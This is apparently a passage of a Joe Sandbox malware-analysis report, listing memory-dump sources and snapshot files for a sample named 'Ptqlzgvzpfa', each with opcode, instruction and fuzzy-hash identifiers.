                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c100462a04af1b0132ef3a8774322606b57937fcef10592ce13921bef8277531
                                                          • Instruction ID: dfbb33091b80a30e65f7eca799b84ae48b13699994f13cf683423dd59e113479
                                                          • Opcode Fuzzy Hash: c100462a04af1b0132ef3a8774322606b57937fcef10592ce13921bef8277531
                                                          • Instruction Fuzzy Hash: 5AE0C2327043359BDAE22A669D01B6233A85B45E21FB0046BE6146F280CA76E8818AA1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3675d80f747b09936587549b8b6159de6d647dfdd1780ec2c5ea2039121d978f
                                                          • Instruction ID: 3c7dfaa87550a128053066d99162497cec346598018b18b61311ab16831a4413
                                                          • Opcode Fuzzy Hash: 3675d80f747b09936587549b8b6159de6d647dfdd1780ec2c5ea2039121d978f
                                                          • Instruction Fuzzy Hash: C8E0C230451208DFC701EFF9E91868E7BF9DF45301F0040A5E90593190EA714A10DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6a9220d420802c32be8ce5c01c01e53498fcf32732a94da65448262129f3482
                                                          • Instruction ID: 38cd3e2c04b8ee34861ff2d3c5795a1ff5563c53a5cffbf013b3cea3c80df942
                                                          • Opcode Fuzzy Hash: a6a9220d420802c32be8ce5c01c01e53498fcf32732a94da65448262129f3482
                                                          • Instruction Fuzzy Hash: 9DE0C231452108DFC741EFF89D1068E7BE89F85300F0044A5D60493190EE724A00DB92
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c203abd81c4f4d276d76d8e565a8abf10b1153faa274c093bba7e2f8307dd6d
                                                          • Instruction ID: 3e267e4207688ae0a936ae072c7bae034b9e51e94d4c976647e2789fc22b3008
                                                          • Opcode Fuzzy Hash: 1c203abd81c4f4d276d76d8e565a8abf10b1153faa274c093bba7e2f8307dd6d
                                                          • Instruction Fuzzy Hash: 72D05E34609108DBC719CB98D855A69BBECDB45319F1498EC980943381CA329D01CB81
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a96bcde3b6c921adc4c5e53302bfe336abc6a4363fdee7ec448255505c3fc82